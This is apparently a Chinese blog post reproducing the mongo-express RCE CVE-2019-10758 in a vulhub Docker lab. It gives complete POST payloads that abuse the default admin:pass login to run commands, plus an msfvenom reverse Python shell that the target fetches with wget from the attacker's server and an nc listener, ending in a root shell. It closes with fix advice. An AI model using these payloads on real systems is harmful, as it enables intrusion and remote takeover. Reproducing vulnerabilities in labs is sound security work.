mongo-express远程代码执行(CVE-2019-10758)漏洞复现(msfvenom/wget,反弹shell)

最新推荐文章于 2024-04-29 20:15:05 发布
最新推荐文章于 2024-04-29 20:15:05 发布
阅读量1.6k 收藏 3
点赞数 1
分类专栏: 漏洞复现 渗透测试 web安全 文章标签: docker mongodb node.js 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/negnegil/article/details/120168608
版权

mongo-express

mongo-express是一个MongoDB的Admin Web管理界面,基于NodeJS、Express、Bootstrap3开源编写

漏洞介绍

在开启了端口8081后,攻击者可以直接访问,而目标服务器上没有修改默认的登录密码admin/pass,则攻击者可以远程执行node.js代码

复现环境

mongo-express 0.53.0 
MongoDB Version 3.4.24

漏洞环境搭建

采用github开源docker漏洞环境搭建而成
项目地址:

https://github.com/vulhub/vulhub/tree/master/mongo-express/CVE-2019-10758

进入具体漏洞环境,执行如下命令启动一个0.53.0版本的mongo-express:

cd vulhub-master/mango-express/CVE-2019-10758
docker-compose build
docker-compose up -d

在这里插入图片描述

启动成功后,访问
ip:8081
出现如下界面表示搭建成功
在这里插入图片描述

漏洞复现

  • 创建目录

抓包发送如下数据包执行代码,在tmp目录下创建success目录

POST /checkValid HTTP/1.1
Host: 192.168.0.113:8081
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Authorization: Basic YWRtaW46cGFzcw==
Content-Type: application/x-www-form-urlencoded
Content-Length: 121


document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("touch /tmp/success")

其中Authorization: Basic YWRtaW46cGFzcw== 经base64解码为Authorization:
Basic admin:pass

通过BurpSuite进行抓包,发送如下数据包
在这里插入图片描述

进入docker中创建的web环境中查看/tmp/目录,可以发现成功创建了success目录

docker-compose exec web ls /tmp

或者获取一个bash shell
docker-compose exec web /bin/bash

在这里插入图片描述
在这里插入图片描述

  • 执行命令反弹shell

思路:
在kali上使用msf生成一个反弹shell.py,开启pythonHTTP服务器供靶机下载
靶机上,通过wget下载shell.py,在利用命令执行漏洞执行这个文件,反弹一个shell给kali

操作步骤
kali上
因为知道靶机web环境中存在python环境,所以创建一个python的反弹shell

msfvenom -p cmd/unix/reverse_python LHOST=192.168.0.109 LPORT=4444 -f raw > shell.py

在这里插入图片描述

运行python HTTP服务器,攻击者将从此服务器上下载shell.py

python -m SimpleHTTPServer

在这里插入图片描述

靶机上
攻击者执行命令,下载Python服务器上的shell.py,保存/tmp/shell
poc如下

POST /checkValid HTTP/1.1
Host: 192.168.0.113:8081
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Authorization: Basic YWRtaW46cGFzcw==
Content-Type: application/x-www-form-urlencoded
Content-Length: 121


document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("wget http://192.168.0.109:8000/shell.py -O /tmp/shell")

下载成功
在这里插入图片描述

kali上监听4444端口

nc -lvp 4444

再次发包命令执行,执行shell文件

POST /checkValid HTTP/1.1
Host: 192.168.0.113:8081
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Authorization: Basic YWRtaW46cGFzcw==
Content-Type: application/x-www-form-urlencoded
Content-Length: 121


document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("bash /tmp/shell")

在这里插入图片描述

反弹shell成功,获得的是root权限
在这里插入图片描述

修复建议

1.及时升级漏洞组件
2.不要使MongoExpres服务暴露在公网上
3.修改默认登录密码admin:pass

Thgilil
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
mongo-express:基于Web的MongoDB管理界面,使用Node.js编写并表达
02-03
mongo-express 使用Node.jsExpress和Bootstrap3编写的基于Web的MongoDB管理界面 产品特点 连接到多个数据库 查看/添加/删除数据库 查看/添加/重命名/删除收藏集 查看/添加/更新/删除文档 在集合视图中内联预览音频/视频/图像资产 嵌套和/或大对象可折叠,以方便查看 异步按需加载大文档属性(默认值> 100KB),以保持快速收集视图 GridFS支持-添加/获取/删除非常大的文件 在文档中使用BSON数据类型 移动/响应式-当您处于绑定状态时,Bootstrap 3可以在小屏幕上正常运行 连接并验证各个数据库 以管理员身份验证以查看所有数据库 数据库黑名单/白名单 自定义CA和CA验证禁用 支持副本集 屏幕截图 主页 数据库视图 集合视图 编辑文件 这些屏幕截图来自版本0.30.40的“查看相册”以获取更多屏幕截图:(服务器状态,数据库视图等。) 发展历程 将config.default.js复制到config.js并编辑默认属性以适合您的本地环境 使用以下命令运行开发版本: npm run start-dev 用法(npm /
漏洞利用之王”HolesWarm挖矿木马新增大量攻击模块强势来袭
bdfcfff77fa的博客
07-30 103
Docker未授权命令执行攻击—|—Jenkins 未授权命令执行攻击Shiro 反序列化 RCEStruts2全系列(s008-s057)漏洞Tomcat 爆破攻击XXL-JOB泛微OA E-cology Bsh 命令执行用友bsh.servlet.BshServlet 命令执行用友GRP-U8注入-命令执行致远OA htmlofficeservlet任意文件写入致远OA-ajax.do文件上传泛微OA代码执行漏洞—|—致远OA未授权漏洞
mongo-express 远程代码执行漏洞复现
Tauil的博客
07-30 931
方法没有进行检验,导致在知晓用户密码情况下可以执行js代码。js文件中定义了该页面访问路径在。同时数据包需要新增类型。打开靶场vulhub。登录网页,发送数据包。
GhostScript 沙箱绕过(命令执行漏洞CVE-2018-16509)
黑白的博客
12-22 1223
声明 好好学习,天天向上 漏洞描述 8 月 21 号,Tavis Ormandy 通过公开邮件列表,再次指出 GhostScript 的安全沙箱可以被绕过,通过构造恶意的图片内容,将可以造成命令执行、文件读取、文件删除等漏洞 GhostScript 被许多图片处理库所使用,如 ImageMagick、Python PIL 等,默认情况下这些库会根据图片的内容将其分发给不同的处理方法,其中就包括 GhostScript。 影响范围 Ghostscript 9.24之前版本 复现过程 这里使用7.0.8版本 使
mongo-express 代码执行 (cve-2019-10758)
qq_51459600的博客
12-24 784
1.环境搭建 项目地址: vulhub/mongo-express/CVE-2019-10758 at master · vulhub/vulhub (github.com) 拉取项目: git clone https://github.com.cnpmjs.org/vulhub/vulhub.git [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-m0qN0Cum-1640341732202)(https://cdn.jsdelivr.net/gh/QJLONG/HUMME
mongo-express 远程代码执行漏洞CVE-2019-10758
qq_50854662的博客
03-01 652
前言 mongo-express是一款mongodb的第三方Web界面,使用node和express开发。如果攻击者可以成功登录,或者目标服务器没有修改默认的账号密码(admin:pass),则可以执行任意node.js代码。 影响版本 mongo-express, 0.54.0 之前的版本 环境搭建 cd vulhub/mongo-express/CVE-2019-10758 docker-compose up -d 环境启动后,访问http://y...
mongo-express 代码执行cve-2019-10758
weixin_48817799的博客
12-30 1147
文章目录前言一、复现过程总结 前言 名称: mongo-express 代码执行cve-2019-10758) 描述: mongo-express是一款mongodb的第三方Web界面,使用node和express开发。如果攻击者可以成功登录,或者目标服务器没有修改默认的账号密码(admin:pass),则可以执行任意node.js代码。 提示:以下是本篇文章正文内容,下面案例可供参考 一、复现过程 1.老样子,fofa靶场http://vulfocus.fofa.so 信息提示如下 2.页面.
Mongo-Express RCE(CVE-2019-10758)复现排查
dayouzi的博客
08-14 269
Mongo-express是的管理工具,类似Navicat对应Mysql的关系,其使用Node.jsExpress和Bootstrap3编写的基于Web的MongoDB图形化管理界面。漏洞问题出在lib/bson.js中的toBSON()函数中,路由 /checkValid 从外部接收输入,并调用了存在 RCE 漏洞代码,由此存在被攻击的风险。
mongo-express 远程代码执行漏洞 CVE-2019-10758 漏洞复现
ADummy的博客
03-04 398
mongo-express 远程代码执行漏洞CVE-2019-10758) by ADummy 0x00利用路线 ​ Burpsuite发包—>命令执行 0x01漏洞介绍 ​ mongo-express是一款mongodb的第三方Web界面,使用node和express开发。如果攻击者可以成功登录,或者目标服务器没有修改默认的账号密码(admin:pass),则可以执行任意node.js代码。 0x 02漏洞复现 ...
CVE-2019-10758mongo-express 远程代码执行漏洞复现
Beret-81的博客
06-18 572
mongo-express 远程代码执行漏洞漏洞描述漏洞环境漏洞复现 漏洞描述 mongo-express是一款mongodb的第三方Web界面,使用node和express开发。如果攻击者可以成功登录,或者目标服务器没有修改默认的账号密码(admin:pass),则可以执行任意node.js代码漏洞环境 环境搭建:https://github.com/vulhub/vulhub/tree/master/mongo-express/CVE-2019-10758 执行如下命令启动一个0.53.0版本的mo
CVE-2019-10758
03-08
CVE-2019-10758 PoC 设置 docker run -p 27017:27017 -d mongo npm install mongo-express@0.53.0 cd node_modules/mongo-express/ && node app.js cURL利用 curl 'http://localhost:8081/checkValid' -H 'Authorization: Basic YWRtaW46cGFzcw==' --data 'document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("/Applications/Calculator.app/Contents/MacOS/Calculator")' 脚本
mongo-sync:同步远程和本地MongoDB数据库
02-02
mongo-sync:同步远程和本地MongoDB数据库
mongo-express-node-generator:mongo-express-node代码生成器
03-16
mongo-express-node-generator:mongo-express-node代码生成器
mongo-mongo-express-k8s:一个用于MongoDBMongo Express的Kubernetes配置项目
02-15
Kubernetes上的Mongo 这是一个Kubernetes配置项目,用于部署和运行MongoDB和... 配置为Opaque类型的Mongo秘密配置文件,其中包含mongo-root-username和mongo-root-password kubectl apply -f deploy/mongo/secrets.y
vue-express-mongo-boilerplate:MEVN具有NodeJS,ExpressMongo和VueJS的全栈JS Web应用程序样板
02-03
Vue,ExpressMongoDB全栈JS Boilerplate 这是带有VueJS + ExpressJS + MongoDB的全栈Webapp样板项目。 这不是一个现成的项目。 我这样做的目的是创建一个包含业务逻辑之外的所有重要功能(用户注册,登录,oauth...
使用 Docker 自建一款怀旧游戏之 - 超级马里奥
Toasten
04-25 639
《 超级马里奥 》(Super Mario)是任天堂公司创造的一款经典游戏系列,是世界上最知名、最成功的游戏之一。这个系列由日本设计师宫本茂于 1985 年创造,最初的游戏名为《超级马里奥兄弟》(Super Mario Bros.),推出后风靡全球。
Docker consul的容器服务更新与发现
最新发布
YUEAwb的博客
04-29 508
consul是google开源的一个使用go语言开发的服务管理软件。支持多数据中心、分布式高可用的、服务发现和配置共享。采用Raft算法,用来保证服务的高可用。内置了服务注册与发现框架、分布一致性协议实现、健康检查、Key/Value存储、多数据中心方案,不再需要依赖其他工具(比如ZooKeeper等)。服务部署简单,只有一个可运行的二进制的包。每个节点都需要运行agent,他有两种运行模式server 和 client。
Docker单独安装xiaoya-alist
wbsu2004的博客
04-29 985
小雅是资源聚合站,通过自己的阿里云盘中转缓存资源,可以实现大量的资源在线播放。
[docker] docker 安全知识 - docker 系统性简介
GoldenaArcher的博客
04-27 890
今年的 security training 选的 topic 就是 docker 了,为了过这个 training 于是先把 docker 过了一遍(笑死之前干啃的时候确实觉得不太能看下去,不过走了一遍实践之后发现就比较好理解。
mongo-cxx-driver-legacy-1.1.2支持的mongodb服务端版本
08-24
mongo-cxx-driver-legacy-1.1.2 支持的 MongoDB 服务端版本是 2.4.x 至 3.0.x。MongoDB 是一个开源的、高性能的、灵活的 NoSQL 数据库,而 mongo-cxx-driver-legacy 是 MongoDB 的官方 C++ 驱动程序的一个版本。该版本的驱动程序在 mongo-cxx-driver 3.0.0 版本之前被广泛使用。 然而,需要注意的是,mongo-cxx-driver-legacy-1.1.2 已经被官方标记为过时(deprecated),并且不再接受维护和修复新 bug。官方强烈建议开发者升级到新的 mongo-cxx-driver 版本以获取更好的性能和功能支持。当前最新的 mongo-cxx-driver 版本为 3.6.x,支持 MongoDB 4.0.x 版本。 对于使用 mongo-cxx-driver-legacy-1.1.2 的开发者,建议尽快升级到较新的驱动程序版本以确保应用程序的正常运行,同时可以获得更好的性能和更多的功能。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值